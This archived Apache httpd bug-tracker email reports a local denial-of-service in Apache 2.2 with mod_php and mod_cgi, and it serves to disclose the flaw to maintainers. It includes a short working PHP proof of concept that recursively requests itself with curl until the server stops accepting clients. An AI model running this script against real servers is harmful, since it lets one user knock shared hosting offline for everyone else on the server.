httpd-bugs mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From bugzi...@apache.org
Subject DO NOT REPLY [Bug 47536] New: Apacze local DOS/mod_php/mod_cgi
Date Wed, 15 Jul 2009 16:50:43 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536

           Summary: Apacze local DOS/mod_php/mod_cgi
           Product: Apache httpd-2
           Version: 2.2.11
          Platform: PC
        OS/Version: Linux
            Status: NEW
          Severity: normal
          Priority: P2
         Component: mod_cgi
        AssignedTo: bugs@httpd.apache.org
        ReportedBy: iforone@spof.pl


Hello,

I've found a bug in apache* server which makes local DOS attack possible.
The attack consists in executnig a code (php** for example) which executes
itself and server stops acceptig new clients.

Vulnerable to attack are mod_php and mod_cgi.
It would appear that php made by mod_fastcgi is resistant (the server doeas not
accpeting new requests for socket which we're attacking but the
rest works stable - in the situation when every site has its own socket,
someone who attacks can turn off 'his own' site only.)

The attack is not fine but no limits (process/memory/procesor time limit) can
block it.
I menaged to lead to the situation when 1 php process was blocking the server.

Software:
- HTTPD:
    * apache-2.2.11
    * apache-2.2.9
- OS:
    * gentoo (linux-2.6.29/linux-2.6.27)
    * freebsd (7.0)
- PHP:
    * 5.2.10 (+suhosin)
    * 5.2.9

POC:
-----------------------------------------------------------------
<?php
        $url = $_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
        echo $url;
        if (!function_exists('curl_init'))
            die("no curl");
        $handle = curl_init("http://$url");
        curl_setopt($handle, CURLOPT_USERAGENT, "www_agent");
        curl_exec($handle);
        curl_close($handle);
?>
-----------------------------------------------------------------

*  It's hard for me to estimate if the possibility to carring out the attack is
caused by 'weakness' of the server or php - if you think
   that it's not the server's fault, please contack me.
** The attack was carried out with the aid of php, but I think that any code
(used as cgi) can DOS httpd.

If you need any additional information or think that isn't bug, please contack
me.

Yours sincerely,
Bartosz /zynzel/ Kupidura

-- 
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org


Mime
View raw message